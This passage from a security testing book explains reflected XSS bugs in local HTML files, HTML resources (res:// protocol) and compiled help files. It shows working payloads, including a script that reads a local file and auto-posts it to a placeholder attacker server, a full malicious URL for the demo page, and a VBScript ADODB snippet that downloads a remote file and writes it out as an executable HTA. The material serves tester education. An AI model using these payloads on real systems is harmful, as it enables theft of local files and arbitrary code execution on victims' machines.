Understanding Reflected XSS Attacks Against Local Files

Example: Local HTML File Reflected XSS

Load localHello.html (which you can find on the companion Web site) in your Web browser. After you enter the filename, insert the hash mark (#) followed by your name. As shown in Figure 10-9, your name will be visible in the local HTML file.

Figure 10-9: The local HTML file echoing the data supplied following the hash mark

View the source of localHello.html. When you examine the source of the document, you see that the name entered after the hash mark isn t present. What s going on? Somehow the HTML contained the name because it is displayed it in the browser. This requires a closer look at the page s source (see Figure 10-10). The script in the page contains a variable named strName . This variable is set with the value of the browser s hash ( location.hash ), excluding the first character in location.hash . (The first character is always the hash mark, and the programmer of the page didn t want to echo that character.) Later in the script, the new contents are written to the HTML displayed (through the DOM) using the document.write method. In this case, Hello, Tom was written. The browser displays the modified HTML content allowing you to see Hello, Tom in the browser window.

Figure 10-10: HTML source, which doesn t contain the user-supplied data in the local XSS exploit

With an understanding of the source code of this file, you know the untrusted data isn t encoded or filtered. Anything placed in the URL after the hash mark is echoed. The programmer likely didn t realize reflected XSS is possible through files on the local hard disk. Try sending in <SCRIPT>alert('Hi!')</SCRIPT> as the data following the hash mark. Bingo! Script runs.

Exploiting Reflected XSS Bugs in Local Files

Before we discuss why XSS bugs in local files are an issue, you must understand the first steps in exploiting these issues. In XSS bugs in Web servers, the attacker coerces the victim into navigating to a URL that contains the XSS bug. The attacker knows the full URL to the buggy page (example: http://server/buggy.aspx ). Everyone can access the page at the same URL. This is good for attackers because they will always know where to point the victim. Much like an XSS bug on a Web server, to exploit an XSS bug in a local file attackers must point the victim to the URL of the buggy file. Unfortunately for attackers, the URL containing the XSS bug varies from system to system; for example, on one attacker s machine it might be C:\SomeCoolProgram\buggy.html, but on another attacker s machine it might be something different such as D:\SomeCoolProgram\buggy.html. The directory names might also be different. How can attackers deal with this? First, most users accept the default installation directory for a program. If a program suggests SomeCoolProgram as the install directory, most users will install to that directory. Also, most people install programs to the C drive. Information disclosure bugs, discussed in Chapter 7, Information Disclosure, might be used in combination with local XSS bugs to help attackers determine where buggy files live on a victim s hard disk.

Understanding Why Local XSS Bugs Are an Issue

Although there probably aren t cookies or user data issued for the local file system, an attacker can still cause harm by exploiting a local XSS bug ”often more harm than attackers can cause with an XSS bug in a Web application. Local XSS bugs enable an attacker s code to run in the My Computer zone, which has the most lax security settings, which is why attackers are quite happy when they discover a local XSS issue. Less security means more fun for attackers.

Remember that an XSS bug can access the DOM of all other pages for the same site. (If you missed it, this information is in the sidebar titled XSS Enables Actions That Are Normally Prohibited earlier in this chapter.) In the My Computer zone, there isn t the notion of domain or site. All of the My Computer zone is treated as the same entity, which means that any page in the My Computer zone can access any other page in this zone through the DOM (file system permissions still apply). Once in the My Computer zone, attackers can read other fileson the local hard disk. Attackers need to know the path of a file they want to look into, but often this isn t a huge issue. Suppose there is a file on the victim s machine named C:\SercetPlans.txt, which contains secret plans. The following script grabs the contents of C:\SecretPlans.txt and displays it in a dialog box:

 <SCRIPT>   var x=window.open('file://c:/SecretPlans.txt','myWindow');   while (x.document.readyState !='complete') ;   var strSecretText=x.document.body.innerText;   x.close();   alert(strSecretText); </SCRIPT> 

If someone with permissions to C:\SecretPlans.txt loads the preceding script, that script will have access to read the file. In the example of exploiting XSS bugs on servers, the contents of the victim s cookie were copied by appending the cookie s value to a URL pointing to the attacker s Web server. The same approach can be used to exploit local XSS bugs, too. However, there are two problems with appending the victim s data to a URL: first, because this is using the GET method the data size is limited to the amount of data that can be contained in the URL. The second problem is that if the victim happens to look in the browser history, the data would look extremely suspicious sitting in the address of a Web page on the attacker s server. Attackers would rather make victims lives simple and not complicate them with such worries. An alternative to sending the data in the URL is to send it through an HTML form using an HTTP POST. Sending the data in this way is not limited to local XSS exploits; it can also be used in server XSS exploits, and in script injection exploits against local files (persistent XSS against local files).

To steal the contents of C:\SecretPlans.txt, an attacker can echo an HTML form and script through a page containing the reflected XSS flaw. The attacker-supplied script will fill out the form using the contents of C:\SecretPlans.txt and will automatically submit the form to the attacker s server. The resulting form and script will look something like this:

 <FORM action="http://AttackersServer/redir.asp" name="myForm" method="POST">   <INPUT type="hidden" name="txtSecretText" id="idText"> </FORM> <SCRIPT>   var x=window.open('file://c:/SecretPlans.txt','myWindow');   while (x.document.readyState !='complete') ;   idText.Value=x.document.body.innerText;    x.close();   idText.submit(); </SCRIPT> 

To exploit the localHello.html example to copy the contents of C:\SecretPlans.txt from the victim s hard drive to the attacker s Web server, the attacker must coerce the victim to browse to the following URL:

  C:\XSSDemos\localHello.html#<FORM action="http://AttaclersServer/redir.asp"   name="myForm" method="POST"><INPUT type="hidden" name="txtSecretText" id="idText">   </FORM><SCRIPT>var x=window.open('file://c:/SecretPlans.txt','myWindow');while   (x.document.readyState !='complete');idText.Value=x.document.body.innerText;   x.close();idText.submit();</SCRIPT>  

Using Local XSS Bugs to Run Binaries on the Victim s Machine

Another fun thing about the My Computer zone is that several ActiveX controls normally blocked from the Internet can be called. Developers of these controls sometimes allow potentially dangerous functionality when the Web page calling the control is in the My Computer zone because they believe only trusted code should be in this zone. In theory, this is correct, but with a single local XSS or local script injection bug an attacker can call into the control.

Microsoft added additional restrictions to some controls that allowed dangerous behavior when called from the My Computer zone because once an attacker could run script in the My Computer zone these controls were being used to run arbitrary code on a victim s machine. One of these controls is Shell.Application, which contains an Open method that takes a parameter named vDir . The vDir parameter can be the path to an executable file such as an .exe file. When the Open method is invoked, the executable specified in vDir is launched.

At the time of this writing, the ADODB.Connection controls (when hosted in the My Computer Zone) can be used to write files to arbitrary files on the local hard disk. A person named Http-equiv wrote code similar to the following script that downloads http://www.example.com/remoteFile.txt and writes the contents locally as C:\localFile.hta (HTA files are HTML applications that have no security restrictions; HTA files should be regarded as similar to running EXE files):

 <script language="vbs"> 'http://www.malware.com - 19.10.04 Dim Conn, rs Set Conn = CreateObject("ADODB.Connection") Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _ "Dbq=http://www.example.com;" & _ "Extensions=asc,csv,tab,txt;" & _ "Persist Security Info=False" Dim sql sql = "SELECT * from foobar.txt" set rs = conn.execute(sql) set rs =CreateObject("ADODB.recordset") rs.Open "SELECT * from remoteFile.txt", conn rs.Save "C:\localFile.hta", adPersistXML rs.close conn.close </script> 

The HTA could be placed in the location of the attacker s choice. Placing it in the victim s startup group would result in execution next time the victim logs on. More on Http-equiv s code is available in his mail to the Full-Disclosure mailing list (see http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027778.html ).

HTML Resources

Binary files can contain resources. Commonly used resources are bitmaps, cursors , dialog boxes, HTML, and string tables. HTMLResExample.dll, included on this book s companion Web site, is an example that contains an HTML resource. HTML resources can contain XSSbugs.

Programs usually call the LoadResource Windows API to retrieve the content of a resource. This API cannot be called through HTML script. The Windows operating system has a res pluggable protocol used to load HTML resources in Internet Explorer from arbitrary files. To read a resource from a file using the res protocol, the following syntax is used:

  res://fileName[/resourceType]/resourceID.  

The resourceType is optional; the default is type 23 (HTML). For example, the HTML resource named dnserror.htm in shdoclc.dll is displayed by visiting res://C:\Windows\System32\ shdoclc.dll/dnserror.htm . You ve probably seen this resource before; it is used by Internet Explorer when your browser encounters a DNS error. The bitmap resource named 533 in the same file can be viewed through res://C:\Windows\System32\shdoclc.dll/2/533 , as shown in Figure 10-11. The full path to the resource file isn t required if it is located in the current path.For example, the bitmap resource in shdoclc.dll can also be loaded with the URL res://shdoclc.dll/2/533 .

Figure 10-11: A bitmap resource located in shdoclc.dll displayed in Internet Explorer by using the res protocol

It turns out that HTML specified in resources can also be exploited by attackers and should be tested for local XSS attacks. The root cause of the vulnerability in the case of resources is identical to the problem exhibited in HTML files on the local file system. The only difference is how the buggy HTML file is accessed: instead of the attacker getting the victim to browse directly to an HTML file that contains an XSS bug on the local hard file system, the attacker gets the victim to load an HTML resource that contains an XSS bug through the res pluggable protocol.

Compiled Help Files

Another type of file to test for local XSS bugs are Compiled Help Module (CHM) files, which end with the .chm extension. Compiled Help files are a set of HTML files bundled together inone CHM file. To examine the contents of a CHM for potential XSS bugs, dump its contents to disk. Microsoft has a free tool, called HTML Help Workshop, available from http://msdn.microsoft.com/library/en-us/htmlhelp/html/hwMicrosoftHTMLHelpDownloads.asp , that can be used either to create or decompile Compiled Help files. It can be used to decompile a CHM so that all of the individual files contained inside of the CHM are easy to examine.

 parent.frames[1].location = "searchResults.htm#" + txtKey- word.value;parent.frames[1].location.reload(); 

 var strKeyword = new String(location.hash); strKeyword = strKeyword.substring(1); document.open(); document.write ("<font face=\"Tahoma\" size=\"2\">"); if(location.hash == "") {    document.write ("Please enter a search term on the left and click \"Search\"."); } else {    document.write ("Search results for &quot;");    document.write (strKeyword);    document.write ("&quot;<BR>No information about that topic."); } 

Finding XSS Bugs in Client-Side Script

Unlike the examples in the beginning of this chapter, the HTML isn t being generated on the server and displayed on the client. The output is being generated on the client and the input data will not appear in the HTML source. How can these bugs be found? The previous approach of looking for the input in the HTML source returned and trying to figure out how to get script run won t work. It is necessary to review the client-side script. Client-side script mostly appears inside <script> tags or is files included by using the src property on the <script> tag. For example, <SCRIPT src= http://www.example.com/common.js ></SCRIPT> includes the code in common.js as if it was contained in the calling HTML page. Client-side script can be included in many other places such as events on an HTML tag and HTML Styles, but the most common will be the <script> tag. By carefully looking at the client-side script, you will be able to identify XSS bugs in the code.

Although it is very difficult to make a complete list of all dangerous code that leads to an XSS condition, Table 10-3 describes a few elements you must investigate carefully if they are present in client-side scripts.